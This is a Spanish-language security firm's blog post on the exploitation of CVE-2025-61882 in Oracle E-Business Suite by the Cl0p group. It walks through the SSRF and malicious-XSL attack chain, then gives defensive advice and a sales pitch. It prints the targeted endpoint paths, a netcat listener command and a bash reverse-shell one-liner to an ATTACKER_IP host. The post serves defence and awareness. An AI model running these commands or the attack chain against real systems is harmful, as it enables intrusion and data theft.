OneCyber

Menú
Menú
Menú

BLOG

Cadena de suministro y software corporativo inseguro

Cadena de suministro y software corporativo inseguro

El caso de Oracle E-Business Suite (EBS) y la explotación masiva por Cl0p

En las últimas semanas se ha observado una campaña de explotación activa contra Oracle E-Business Suite (EBS) que, pese a su impacto potencial, ha pasado relativamente desapercibida fuera de círculos especializados. El caso es especialmente relevante porque combina software corporativo ampliamente desplegado, explotación sin autenticación y ataques de cadena de suministro, una combinación que amplifica el daño a gran escala.

1) ¿Qué es Oracle E-Business Suite y por qué importa?

Oracle E-Business Suite es una suite ERP empresarial utilizada globalmente para gestionar funciones críticas como:

  • Finanzas y contabilidad
  • Recursos Humanos
  • Gestión de la cadena de suministro
  • Compras, pagos y facturación
  • Operaciones internas de negocio

Al tratarse de un sistema core en muchas organizaciones, cualquier vulnerabilidad explotable en EBS no solo afecta a una aplicación aislada, sino al corazón operativo del negocio.

2) La vulnerabilidad CVE-2025-61882

La vulnerabilidad explotada, CVE-2025-61882, presenta características especialmente graves:

  • CVSS: 9.8 (Crítica)
  • Afecta a Oracle EBS 12.2.3 – 12.2.14
  • Permite Remote Code Execution (RCE)
  • No requiere autenticación
  • Fue explotada antes de la publicación del parche (zero-day)

El fallo reside en componentes relacionados con BI Publisher / procesamiento XSL, expuestos a través de endpoints accesibles vía HTTP.

3) Cómo funciona técnicamente el exploit (flujo real de explotación)

La explotación de CVE-2025-61882 no es trivial, pero sí extremadamente efectiva. Se basa en un workflow bien definido que combina SSRF, XSL malicioso y ejecución de comandos vía Java, permitiendo RCE completo sin credenciales.

3.1 Inicialización del servidor de payload

El atacante levanta un servidor HTTP malicioso (por ejemplo, mediante server.py) encargado de servir un archivo XSL (Extensible Stylesheet Language) especialmente diseñado.

Este XSL contiene:

  • Un payload de reverse shell codificado en Base64
  • Código JavaScript que será ejecutado dentro del entorno Java de Oracle EBS

El servidor suele escuchar en un puerto arbitrario (por ejemplo, 8808) y expone múltiples rutas para maximizar compatibilidad con distintos flujos internos de EBS:

GET /OA_HTML/help/../ieshostedsurvey.xsl
POST /OA_HTML/help/../ibeCRgpIndividualUser.jsp

Ambas rutas devuelven el mismo XSL malicioso.

3.2 Preparación del listener de reverse shell

En paralelo, el atacante configura un listener para recibir la conexión entrante desde el sistema comprometido, normalmente con herramientas estándar como Netcat:

nc -lvp 4444

Este listener queda a la espera de que el payload sea ejecutado en el servidor Oracle EBS.

3.3 Explotación vía SSRF

La explotación se activa mediante un script (por ejemplo, exp.py) que envía una petición HTTP especialmente manipulada al servidor EBS.

El punto clave es el parámetro return_url, que:

  • Apunta al servidor del atacante
  • Está codificado usando entidades HTML numéricas para evadir filtros básicos

Esto provoca que Oracle EBS resuelva internamente la URL y solicite el recurso remoto, desencadenando un Server-Side Request Forgery (SSRF).

El resultado: el servidor EBS descarga el XSL malicioso desde el servidor del atacante creyendo que se trata de un recurso legítimo.

3.4 Procesamiento del XSL y ejecución remota de código

Una vez descargado, Oracle EBS procesa el archivo XSL de forma insegura. El XSL contiene código JavaScript que se ejecuta mediante la API:

javax.script

Este script decodifica el payload Base64 y ejecuta comandos del sistema usando:

java.lang.Runtime.getRuntime().exec(...)

Normalmente, el comando ejecutado es una reverse shell, por ejemplo:

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Este es el punto en el que se consigue RCE completo en el servidor.

3.5 Establecimiento de la reverse shell

Tras la ejecución exitosa del payload, el servidor Oracle EBS inicia una conexión saliente hacia el listener del atacante.

La shell obtenida suele ejecutarse bajo el usuario:

oracle

Desde este momento, el atacante tiene acceso interactivo al sistema, con capacidad para:

  • Exfiltrar datos sensibles
  • Pivotar lateralmente
  • Instalar persistencia
  • Acceder a módulos financieros, HR y operacionales

4) Explotación en el mundo real: Cl0p

El grupo Cl0p, conocido por campañas anteriores como MOVEit y GoAnywhere, ha utilizado esta vulnerabilidad en ataques de robo de datos y extorsión.

Casos confirmados incluyen:

  • Ataques masivos a organizaciones globales
  • Envío de correos de extorsión a directivos
  • Uso del acceso para exfiltración silenciosa, no solo ransomware
  • Impacto indirecto en terceros (proveedores, filiales, partners)

Un ejemplo notable es el caso de Korean Air, donde datos de decenas de miles de empleados fueron expuestos a través de un sistema Oracle comprometido.

5) Lecciones clave desde la perspectiva de cadena de suministro

a) El parche llega tarde

La explotación activa antes de la publicación del parche demuestra que esperar a la corrección oficial no es suficiente en software corporativo crítico.

b) El ERP como punto único de fallo

Un ERP expuesto o mal segmentado se convierte en un vector de compromiso total del negocio.

c) Riesgo real de supply chain

Una única vulnerabilidad en un sistema compartido puede afectar a múltiples organizaciones downstream, incluso sin relación directa entre ellas.

6) Medidas defensivas recomendadas

  • Restringir completamente el acceso externo a Oracle EBS
  • Aplicar parches de forma inmediata
  • Monitorizar peticiones HTTP anómalas a endpoints /OA_HTML/
  • Detectar conexiones salientes inesperadas desde servidores EBS
  • Revisar ejecución de Runtime.exec() y uso de javax.script
  • Incorporar EBS a planes de threat hunting y purple team

Conclusión

El caso de CVE-2025-61882 en Oracle E-Business Suite es un ejemplo claro de cómo software corporativo ampliamente desplegado puede convertirse en un vector de ataque de cadena de suministro de alto impacto.

La combinación de RCE sin autenticación, explotación zero-day y uso por actores avanzados como Cl0p convierte este incidente en una señal clara:

Los sistemas core de negocio son objetivos prioritarios y deben tratarse como infraestructura crítica.

Protege tu infraestructura crítica con expertos

Frente a amenazas de esta complejidad y alcance, contar con una estrategia proactiva y capacidades especializadas no es una opción, sino una necesidad. En OneCyber ofrecemos servicios de ciberseguridad especializados para proteger entornos empresariales críticos como Oracle EBS y otros ERP.

No esperes a que un incidente comprometa el corazón de tu negocio. Te ayudamos a construir una defensa robusta, desde la prevención hasta la respuesta.

¿Tu empresa está preparada si sufre un ciberataque?

Haz nuestro Test de Madurez y descubre los puntos de mejora de la seguridad de tu empresa

Hacer test